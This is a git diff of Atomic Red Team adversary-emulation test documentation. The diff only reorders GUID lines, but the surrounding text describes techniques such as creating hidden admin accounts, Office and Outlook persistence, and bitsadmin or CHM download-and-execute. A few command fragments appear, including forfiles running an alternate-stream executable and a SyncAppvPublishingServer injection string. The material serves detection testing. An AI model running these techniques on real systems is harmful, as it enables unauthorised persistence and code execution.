## Atomic Test #4 - Network Share Discovery PowerShell - -auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb - Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** 1b0814d1-bb24-402d-9615-1b20c50733fb + + +
@@ -158,13 +166,15 @@ get-smbshare
## Atomic Test #5 - View available share drives - -auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae - View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** ab39a04f-0c93-4540-9ff2-83f862c385ae + + +
@@ -184,13 +194,15 @@ net share
## Atomic Test #6 - Share Discovery with PowerView - -auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd - Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** b1636f0a-ba82-435c-b699-0d78794d8bfd + + +
diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md
index 5a814eb8..de0dfdfd 100644
--- a/atomics/T1136.001/T1136.001.md
+++ b/atomics/T1136.001/T1136.001.md
@@ -22,13 +22,15 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a user account on a Linux system - -auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 - Create a user via useradd + **Supported Platforms:** Linux +**auto_generated_guid:** 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + + + #### Inputs:
@@ -57,13 +59,15 @@ userdel #{username}
## Atomic Test #2 - Create a user account on a MacOS system - -auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2 - Creates a user on a MacOS system with dscl + **Supported Platforms:** macOS +**auto_generated_guid:** 01993ba5-1da3-4e15-a719-b690d4f0f0b2 + + + #### Inputs:
@@ -98,14 +102,16 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt - -auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f - Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" + **Supported Platforms:** Windows +**auto_generated_guid:** 6657864e-0323-4206-9344-ac9cd7265a4f + + + #### Inputs:
@@ -135,14 +141,16 @@ net user /del "#{username}" >nul 2>&1
## Atomic Test #4 - Create a new user in PowerShell - -auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde - Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" + **Supported Platforms:** Windows +**auto_generated_guid:** bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + + + #### Inputs:
@@ -171,13 +179,15 @@ Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. - -auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c - Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. + **Supported Platforms:** Linux +**auto_generated_guid:** a1040a30-d28b-4eda-bd99-bb2861a4616c + + + #### Inputs:
@@ -208,13 +218,15 @@ userdel #{username}
## Atomic Test #6 - Create a new Windows admin user - -auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 - Creates a new admin user in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** fda74566-a604-4581-a4cc-fbbe21d66559 + + + #### Inputs:
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index 698235a2..7ab024da 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
@@ -16,13 +16,15 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a new Windows domain admin user - -auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 - Creates a new domain admin user in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** fcec2963-9951-4173-9bfa-98d8b7834e62 + + + #### Inputs:
@@ -54,13 +56,15 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON - -auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 - Create a new account similar to ANONYMOUS LOGON in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + + + #### Inputs:
@@ -90,13 +94,15 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #3 - Create a new Domain Account using PowerShell - -auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 - Creates a new Domain User using the credentials of the Current User + **Supported Platforms:** Windows +**auto_generated_guid:** 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + + + #### Inputs:
diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md
index 1fee5136..630447b7 100644
--- a/atomics/T1137.002/T1137.002.md
+++ b/atomics/T1137.002/T1137.002.md
@@ -17,14 +17,16 @@ Adversaries may add this Registry key and specify a malicious DLL that will be e
## Atomic Test #1 - Office Application Startup Test Persistence - -auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 - Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. + **Supported Platforms:** Windows +**auto_generated_guid:** c3e35b58-fe1c-480b-b540-7600fb612563 + + + #### Inputs:
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md
index c7058537..28762842 100644
--- a/atomics/T1137.004/T1137.004.md
+++ b/atomics/T1137.004/T1137.004.md
@@ -13,15 +13,17 @@ Once malicious home pages have been added to the user’s mailbox, they will be
## Atomic Test #1 - Install Outlook Home Page Persistence - -auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e - This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + **Supported Platforms:** Windows +**auto_generated_guid:** 7a91ad51-e6d2-4d43-9471-f26362f5738e + + + #### Inputs:
diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md
index b8b4f65b..b765083c 100644
--- a/atomics/T1137/T1137.md
+++ b/atomics/T1137/T1137.md
@@ -12,17 +12,19 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 - -auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c - As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' - A file called VbaProject.OTM must be created in the Outlook Folder. + **Supported Platforms:** Windows +**auto_generated_guid:** bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + + +
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index fc670d0d..c4b0d4ed 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -16,14 +16,16 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
## Atomic Test #1 - Deobfuscate/Decode Files Or Information - -auto_generated_guid: dc6fe391-69e6-4506-bd06-ea5eeb4082f8 - Encode/Decode executable Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** dc6fe391-69e6-4506-bd06-ea5eeb4082f8 + + + #### Inputs:
@@ -54,13 +56,15 @@ del %temp%\T1140_calc_decoded.exe >nul 2>&1
## Atomic Test #2 - Certutil Rename and Decode - -auto_generated_guid: 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 - Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) + **Supported Platforms:** Windows +**auto_generated_guid:** 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 + + + #### Inputs:
diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md
index a5a461b2..4cc5ff74 100644
--- a/atomics/T1176/T1176.md
+++ b/atomics/T1176/T1176.md
@@ -24,13 +24,15 @@ There have also been instances of botnets using a persistent backdoor through ma
## Atomic Test #1 - Chrome (Developer Mode) - -auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 - Turn on Chrome developer mode and Load Extension found in the src directory + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + + + #### Run it with these steps!
@@ -52,13 +54,15 @@ tick 'Developer Mode'.
## Atomic Test #2 - Chrome (Chrome Web Store) - -auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f - Install the "Minimum Viable Malicious Extension" Chrome extension + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + + + #### Run it with these steps!
@@ -77,13 +81,15 @@ in Chrome
## Atomic Test #3 - Firefox - -auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 - Create a file called test.wma, with the duration of 30 seconds + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938 + + + #### Run it with these steps!
@@ -104,13 +110,15 @@ click "Load Temporary Add-on"
## Atomic Test #4 - Edge Chromium Addon - VPN - -auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 - Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. + **Supported Platforms:** Windows, macOS +**auto_generated_guid:** 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + + + #### Run it with these steps!
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index 55789fa2..f5068754 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -22,14 +22,16 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter
## Atomic Test #1 - Bitsadmin Download (cmd) - -auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 - This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload + **Supported Platforms:** Windows +**auto_generated_guid:** 3c73d728-75fb-4180-a12f-6712864d7421 + + + #### Inputs:
@@ -59,16 +61,18 @@ del #{local_file} >nul 2>&1
## Atomic Test #2 - Bitsadmin Download (PowerShell) - -auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc - This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory + **Supported Platforms:** Windows +**auto_generated_guid:** f63b8bc4-07e5-4112-acba-56f646f3f0bc + + + #### Inputs:
@@ -98,16 +102,18 @@ Remove-Item #{local_file} -ErrorAction Ignore
## Atomic Test #3 - Persist, Download, & Execute - -auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae - This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. + **Supported Platforms:** Windows +**auto_generated_guid:** 62a06ec5-5754-47d2-bcfc-123d8314c6ae + + + #### Inputs:
@@ -144,16 +150,18 @@ del #{local_file} >nul 2>&1
## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) - -auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ + **Supported Platforms:** Windows +**auto_generated_guid:** afb5e09e-e385-4dee-9a94-6ee60979d114 + + + #### Inputs:
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index 9ed98eb9..e2953cf8 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -24,13 +24,15 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
## Atomic Test #1 - Examine password complexity policy - Ubuntu - -auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b - Lists the password complexity policy to console on Ubuntu Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 085fe567-ac84-47c7-ac4c-2688ce28265b + + +
@@ -50,13 +52,15 @@ cat /etc/pam.d/common-password
## Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x - -auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d - Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 78a12e65-efff-4617-bc01-88f17d71315d + + +
@@ -88,13 +92,15 @@ echo Please run from CentOS or RHEL v7
## Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x - -auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 - Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 6ce12552-0adb-4f56-89ff-95ce268f6358 + + +
@@ -127,13 +133,15 @@ echo Please run from CentOS or RHEL v6
## Atomic Test #4 - Examine password expiration policy - All Linux - -auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a - Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c86c55c-70fa-4a05-83c9-3aa19b145d1a + + +
@@ -153,13 +161,15 @@ cat /etc/login.defs
## Atomic Test #5 - Examine local password policy - Windows - -auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 - Lists the local password policy to console on Windows. + **Supported Platforms:** Windows +**auto_generated_guid:** 4588d243-f24e-4549-b2e3-e627acc089f6 + + +
@@ -179,13 +189,15 @@ net accounts
## Atomic Test #6 - Examine domain password policy - Windows - -auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 - Lists the domain password policy to console on Windows. + **Supported Platforms:** Windows +**auto_generated_guid:** 46c2c362-2679-4ef5-aec9-0e958e135be4 + + +
@@ -205,13 +217,15 @@ net accounts /domain
## Atomic Test #7 - Examine password policy - macOS - -auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 - Lists the password policy to console on macOS. + **Supported Platforms:** macOS +**auto_generated_guid:** 4b7fa042-9482-45e1-b348-4b756b2a0742 + + +
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 3c32944b..fb234e50 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -16,15 +16,17 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe - -auto_generated_guid: cecfea7a-5f03-4cdd-8bc8-6f7c22862440 - The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open + **Supported Platforms:** Windows +**auto_generated_guid:** cecfea7a-5f03-4cdd-8bc8-6f7c22862440 + + + #### Inputs:
@@ -51,16 +53,18 @@ pcalua.exe -a #{payload_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe - -auto_generated_guid: 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc - forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened + **Supported Platforms:** Windows +**auto_generated_guid:** 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc + + + #### Inputs:
@@ -86,15 +90,17 @@ forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe
## Atomic Test #3 - Indirect Command Execution - conhost.exe - -auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 - conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer. Executing it through command line can create process ancestry anomalies [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/) + **Supported Platforms:** Windows +**auto_generated_guid:** cf3391e0-b482-4b02-87fc-ca8362269b29 + + + #### Inputs:
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index e5bc2484..f9bf6006 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -28,17 +28,19 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
## Atomic Test #1 - OSTap Style Macro Execution - -auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff - This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader + **Supported Platforms:** Windows +**auto_generated_guid:** 8bebc690-18c7-4549-bc98-210f7019efff + + + #### Inputs:
@@ -88,13 +90,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #2 - OSTap Payload Download - -auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 - Uses cscript //E:jscript to download a file + **Supported Platforms:** Windows +**auto_generated_guid:** 3f3af983-118a-4fa1-85d3-ba4daa739d80 + + + #### Inputs:
@@ -125,14 +129,16 @@ del #{script_file} /F /Q >nul 2>&1
## Atomic Test #3 - Maldoc choice flags command execution - -auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 - This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + **Supported Platforms:** Windows +**auto_generated_guid:** 0330a5d2-a45a-4272-a9ee-e364411c4b18 + + + #### Inputs:
@@ -177,14 +183,16 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #4 - OSTAP JS version - -auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 - Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + **Supported Platforms:** Windows +**auto_generated_guid:** add560ef-20d6-4011-a937-2c340f930911 + + + #### Inputs:
@@ -230,13 +238,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #5 - Office launching .bat file from AppData - -auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa - Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 9215ea92-1ded-41b7-9cd6-79f9a78397aa + + + #### Inputs:
@@ -282,18 +292,20 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - Excel 4 Macro - -auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 - This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec. A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username + **Supported Platforms:** Windows +**auto_generated_guid:** 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 + + + #### Inputs:
@@ -392,15 +404,17 @@ Write-Host "You will need to install Microsoft Excel manually to meet this requi
## Atomic Test #7 - Headless Chrome code execution via VBA - -auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a - This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system. + **Supported Platforms:** Windows +**auto_generated_guid:** a19ee671-ed98-4e9d-b19c-d1954a51585a + + +
@@ -449,13 +463,15 @@ Write-Host "You will need to install Google Chrome manually to meet this require
## Atomic Test #8 - Potentially Unwanted Applications (PUA) - -auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 - The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + **Supported Platforms:** Windows +**auto_generated_guid:** 02f35d62-9fdc-4a97-b899-a5d9a876d295 + + + #### Inputs:
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index 8c22bc80..a93d1f53 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -14,9 +14,6 @@ This technique may bypass system logging and security monitors such as security
## Atomic Test #1 - DCShadow - Mimikatz - -auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 - Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/)
@@ -27,9 +24,14 @@ Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | sel Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. The easiest is to run elevated and as a Domain Admin user. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 + + + #### Inputs:
diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md
index 66a7732e..90da7ee0 100644
--- a/atomics/T1216.001/T1216.001.md
+++ b/atomics/T1216.001/T1216.001.md
@@ -12,13 +12,15 @@
## Atomic Test #1 - PubPrn.vbs Signed Script Bypass - -auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c - Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. + **Supported Platforms:** Windows +**auto_generated_guid:** 9dd29a1f-1e16-4862-be83-913b10a88f6c + + + #### Inputs:
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index c73cfd7b..75554d61 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -12,14 +12,16 @@
## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution - -auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb - Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 275d963d-3f36-476c-8bef-a2a3960ee6eb + + + #### Inputs:
@@ -44,13 +46,15 @@ C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
## Atomic Test #2 - manage-bde.wsf Signed Script Command Execution - -auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a - Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + **Supported Platforms:** Windows +**auto_generated_guid:** 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a + + + #### Inputs:
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md
index a7ef7b04..19cac217 100644
--- a/atomics/T1217/T1217.md
+++ b/atomics/T1217/T1217.md
@@ -26,13 +26,15 @@ Specific storage locations vary based on platform and/or application, but browse
## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux - -auto_generated_guid: 3a41f169-a5ab-407f-9269-abafdb5da6c2 - Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. + **Supported Platforms:** Linux +**auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2 + + + #### Inputs:
@@ -62,13 +64,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS - -auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b - Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. + **Supported Platforms:** macOS +**auto_generated_guid:** 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b + + + #### Inputs:
@@ -98,13 +102,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS - -auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc - Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. + **Supported Platforms:** macOS +**auto_generated_guid:** b789d341-154b-4a42-a071-9111588be9bc + + + #### Inputs:
@@ -134,14 +140,16 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell - -auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 - Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** faab755e-4299-48ec-8202-fc7885eb6545 + + +
@@ -161,14 +169,16 @@ Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyCo
## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt - -auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 - Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 76f71e2f-480e-4bed-b61e-398fe17499d5 + + +
@@ -188,14 +198,16 @@ where /R C:\Users\ Bookmarks
## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt - -auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 - Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 4312cdbc-79fc-4a9c-becc-53d49c734bc5 + + +
@@ -215,13 +227,15 @@ where /R C:\Users\ places.sqlite
## Atomic Test #7 - List Internet Explorer Bookmarks using the command prompt - -auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 - This test will list the bookmarks for Internet Explorer that are found in the Favorites folder + **Supported Platforms:** Windows +**auto_generated_guid:** 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 + + +
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index a76fe782..270b1aa0 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -24,14 +24,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
## Atomic Test #1 - Compiled HTML Help Local Payload - -auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8 - Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open + **Supported Platforms:** Windows +**auto_generated_guid:** 5cb87818-0d7c-4469-b7ef-9224107aebe8 + + + #### Inputs:
@@ -69,14 +71,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Compiled HTML Help Remote Payload - -auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d - Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open + **Supported Platforms:** Windows +**auto_generated_guid:** 0f8af516-9818-4172-922b-42986ef1e81d + + + #### Inputs:
@@ -101,13 +105,15 @@ hh.exe #{remote_chm_file}
## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution - -auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 - Executes a CHM file with the default Shortcut Command method. + **Supported Platforms:** Windows +**auto_generated_guid:** 29d6f0d7-be63-4482-8827-ea77126c1ef7 + + + #### Inputs:
@@ -147,13 +153,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler - -auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 - Executes a CHM file with the ITS protocol handler. + **Supported Platforms:** Windows +**auto_generated_guid:** b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + + + #### Inputs:
@@ -194,13 +202,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
